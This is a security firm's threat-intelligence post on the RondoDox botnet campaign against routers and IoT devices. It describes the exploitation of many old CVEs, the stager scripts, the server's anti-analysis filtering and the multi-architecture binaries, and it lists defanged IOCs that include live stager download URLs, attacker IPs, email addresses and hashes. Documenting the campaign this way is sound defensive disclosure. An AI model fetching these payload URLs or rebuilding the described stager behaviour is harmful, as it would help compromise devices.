SOCcare December 2025: RondoDox Campaign: Routers Beware

During a recent threat-hunting exercise, something caught my eye: repeated references to the term “Rondo.” At first, I dismissed it as normal background radiation – after all, “Rondo is also the name of a well-known Lithuanian music band. But as I dug deeper, it revealed several noteworthy twists.

Initial foothold

In our field of view, the campaign first appeared on 15 November 2025 and remains active at the time of writing. The threat actor primarily targets routers and other IoT devices by exploiting publicly known vulnerabilities – such as Asus WRT LAN Backdoor Command Execution (CVE-2014-9583) and  Linksys WAP54G debug.cgi Shell Access as Gemtek (CVE-2010-1573). In total, the actor cycles through more than 50 known vulnerabilities (some with assigned CVE IDs, some unassigned), rapidly testing each one against the exposed devices in a technique commonly referred to as an “exploit shotgun.” The objective is simple: achieve remote code execution to download and run the stager script. In all observed intrusions, the exploitation stage originated from 192[.]159[.]99[.]95, while the stager itself was hosted separately at 74[.]194[.]191[.]52. Analysis of the hosting infrastructure suggests this IP (74[.]194[.]191[.]52) is likely a compromised Ubiquiti UniFi router.

 

Stager scripts

Across the campaign, we observed 15 stager scripts, all following the naming pattern rondo.{three_letters}.sh.

Each script is retrieved directly from the attacker-controlled host at: hxxp[://]74[.]194[.]191[.]52/rondo[.]{three_letters}[.]sh

Despite minor differences, the stagers follow a consistent pattern. They first attempt to reduce their footprint by redirecting output to /dev/null, removing temporary files, and cycling through common writable directories such as /tmp, /var/tmp, and /dev/shm. This appears intended to ensure reliable execution on a wide range of IoT or router operating environments.

The scripts then prepare a small working directory, download a set of candidate payloads, assign broad execution permissions, and try running them sequentially. The logic is intentionally simple and architecture-agnostic: whichever payload executes successfully becomes the active component of the RondoDox infection chain.

To prevent conflicts with earlier infections, the stagers also repeatedly terminate any running rondo processes before launching a fresh instance.

 

Interesting anti-analysis technique

Collecting the stager scripts and binaries was more challenging than expected. The server behind the campaign applies a strict request‑filtering logic that quickly bans anything that doesn’t look like a real infected device. A mismatched User‑Agent, or probing the commented‑out rondo.lol path resulted in an immediate IP ban and a meaningless response (displaying “rondo2012@atomicmail[.]io”) on subsequent requests.

It’s a relatively simple mechanism on the surface, but in practice it’s surprisingly effective – forcing repeated attempts from new IPs and slowing down analysis unless the request flow closely mimics the intended victim’s behavior.

 

Malware

The final stage of the campaign delivers 18 architecture specific binaries, enabling the threat actor to compromise a wide variety of routers and IoT devices. The collected samples include:

Architecture Family Specific Builds
x86 x86_64, i686, i586, i486
ARM armv4l, armv5l, armv6l, armv7l, armebhf, armeb
MIPS mips, mipsel
PowerPC powerpc, powerpc‑440fp
Other arc700, sh4, sparc, m68k

 

All analyzed samples point to a clear goal: the malware is designed to conscript infected devices into a botnet.

Static analysis reveals indicators supporting this, including routines associated with network flooding, command‑and‑control communication, and device capability detection. One particularly interesting detail is a hard‑coded User‑Agent:

Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1

This likely allows the malware to masquerade as an iPhone browser during outbound traffic – useful for blending in with legitimate mobile traffic or evading simplistic filtering during DDoS attacks.

Additionally, the binaries contain a set of obfuscated strings, such as “steam”, “valve”, and “roblox”. Their purpose is unclear for the time being.

Overall, the malware is tailored for maximum architecture coverage, traffic disguise, and anti‑analysis, all of which are consistent with modern botnet‑oriented operations.

Conclusion

The RondoDox campaign shows how attackers can exploit unpatched routers and IoT devices to build a botnet, using multi-architecture malware, stager scripts, and clever anti-analysis techniques. The key lesson is simple but crucial: keep your devices updated. Many of these attacks rely on vulnerabilities that have existed for years – regular patching and firmware updates remain the best way to stay protected.

IOCs

  1. IPs:
    • 74[.]194[.]191[.]52
    • 192[.]159[.]99[.]95
  2. URLs:
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]naz[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]qre[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]bxf[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]dgx[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]rfg[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]nxr[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]wcr[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]txg[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]qyt[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]dtm[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]xcw[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]ame[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]pms[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]enk[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]qbq[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]qpu[.]sh
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]lol
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]x86_64
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]mipsel
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]mips
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]armv6l
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]armv5l
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]armv4l
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]armv7l
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]powerpc
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]powerpc-440fp
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]i686
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]i586
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]i486
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]arc700
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]sh4
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]sparc
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]m68k
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]armebhf
    • hxxp[://]74[.]194[.]191[.]52/rondo[.]armeb
  3. User-Agents:
    • Mozilla/5.0 (rondo2012@atomicmail[.]io)
    • Mozilla/5.0 (bang2013@atomicmail[.]io)
  4. Emails:
    • rondo2012@atomicmail[.]io
    • bang2013@atomicmail[.]io
    • bang2012@protonmail[.]com
    • makenoise@tutanota[.]de
  5. Hashes:
    • rondo.x86_64              a5e7e430eb45810ec182213cb8130b8ced069d06109582c6806496e053abebec
    • rondo.mipsel              fb717919d32fd54ec20f0145b7315068882dc98b40bca00b345282618031556e
    • rondo.mips                8376dbc62079fe6abfaa86ed168e2726ef54bac51aaac0aebb1f1e1c0d3c8add
    • rondo.armv6l              b3e99f290765d5b393467f844f4c49e62ccda0a333cd48c38f329fdcf150c33c
    • rondo.armv5l              3752ae2b9fdef6e3c583a1aaba3728c908cd66b437ebb6dc82ad3e409a005bde
    • rondo.armv4l              e9b771192c389be4a747a6163375e4e64c52ca1cf3446133fe3011150303b7b6
    • rondo.armv7l              24207f29d1119d9f964afcebbba039900711196ff62690049cad463a4744920b
    • rondo.powerpc             589644016eca57becb8aa468d81f8f50e37436834b8cfecabcb2231aa6406e67
    • rondo.powerpc-440fp       fbc9160483865bc305ad75c08e660bed90483f01934b62b61bf959ed670d135e
    • rondo.i686                7d71843e970e513f710fa8a73095aee300c6fea9978d4b3934a3d5ba4d03ed82
    • rondo.i586                e26e9ef6e284132158fb548a3224a7ace3451ee8eff48534b9fca9b6524d8588
    • rondo.i486                c1de6b8281ba8a180b64552705621ebcb10cf9c6408c1ccb0c260f8396d5fe3d
    • rondo.arc700              94cce12197b78a0c1ae4302fa26bc78210b5b02232ebddbcc404d705d1c993c9
    • rondo.sh4                 133ccfcc9344c80d9e8d2228f7f8d504254b4fecae8bb5c4419c859231e0566f
    • rondo.sparc               2e89e11cca0f5cdadf1e0fbff351ffe2686e5b41893f99ba20a27af35e67565c
    • rondo.m68k                03b4068d9c8ff3d57f6d75c10e82bbfea9e776643d216982054dccebf54e33de
    • rondo.armebhf             fa49586d00cb6e2f8de473fb2c65659eb9d22baf97ed022768a01c1fc76fb648
    • rondo.armeb               44304074a087f1dfa772e9d1ceb608e031b69d51a0f3fe10ffc3af5a8c799196
    • rondo.naz.sh ef1c1a228a07bba447e8f770328a71a0248d8387350ebf65e22289ea33923d62
    • rondo.qre.sh 2f29b67ce81b4b29a56d4efbe75c292b6c11a7caaf44cc22fdf0430b490129c9
    • rondo.bxf.sh fb14ec409ff61a70d0a64d1160f14ef6b95e48444addffd917e3b2df6d3ac165
    • rondo.dgx.sh 092f2f6812c25b2ecf88e576a6758b4b2a71e8cd371ea061d8ceac2f0da8363e
    • rondo.rfg.sh 271bb72b197f8be3c02426ce78688d6af99413b94742d79c590a18b7ad9727cd
    • rondo.nxr.sh 06650acec9ad86758ef801165a693ee737daf28aeebf6e0e60aefae4629827a4
    • rondo.wcr.sh fa65b29dd71aca81f9a7ec6b01d50873aaa689cde24470b5e1bff625108ec65c
    • rondo.txg.sh 998c29db84070d615b0ec3fc06aa94466dd9554c10ed929c64681d2ae3234817
    • rondo.qyt.sh 9b21db1f10e624a6d6605936a1687c879b0a38cd2860cc5c87a6f26b8822ffe9
    • rondo.dtm.sh c178b1b59e61f9bfb9393d5ae7b77488fda3e9f0117a7f4dfe999db6cc6f8cbc
    • rondo.xcw.sh 91b152bfca3d11614826f0c701902d66e0405564d90bb0b614d7416c52a07bc9
    • rondo.ame.sh d392ec56c484a233e2eb50c5bc08b878d1cf761570d0419953e900bc650cdfbc
    • rondo.pms.sh c5646db29815d352ed8a0d5db17f2f5fe15eb253dbf8928936e2871a62eb0543
    • rondo.enk.sh 521b5bcf7047a580b70c9b1f75e58f4d22325a7125cfc540df7306d08e4526b0
    • rondo.qbq.sh ef61e8ca2704f3050c5845a363ef9c73becda897920b90b605a7a50def7ba263
    • rondo.qpu.sh 6cdd970500c9b20805fd9ab13d57a058eaebd2240b1b460c297eea045e6f04b2

 

Written by Justas Kaminskas, CyberSOC Cybersecurity Engineer

 

The SOCcare project is co-funded by the European Union, alongside our collaborators, NRD Cyber Security and RevelSI, and supported by the European Cybersecurity Competence Centre (ECCC) Centre (ECCC) under Grant Agreement No. 101145843. Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Cybersecurity Competence Centre. Neither the European Union nor the European Cybersecurity Competence Centre can be held responsible for them. 

 

 

 

Other news

Engaging management and operational teams to do trainings, TTXs, practice sessions, etc.
Designing an engaging and realistic TTX for an organisation
Designing an engaging and realistic TTX for an organisation
Weekly cyber drills? How to make them a mission possible
Weekly cyber drills? How to make them a mission possible
How to design and lead multi-organisational and multi-national TTXs?
How to design and lead multi-organisational and multi-national TTXs?
NRD Cyber Security liquidates NRD Bangladesh
NRD Cyber Security liquidates NRD Bangladesh
What impact might NIS2 have on Africa?
What impact might NIS2 have on Africa?
What impact might NIS2 have on South America?
What impact might NIS2 have on South America?
How Lithuania stepped up its game with the NIS2 directive
How Lithuania stepped up its game with the NIS2 directive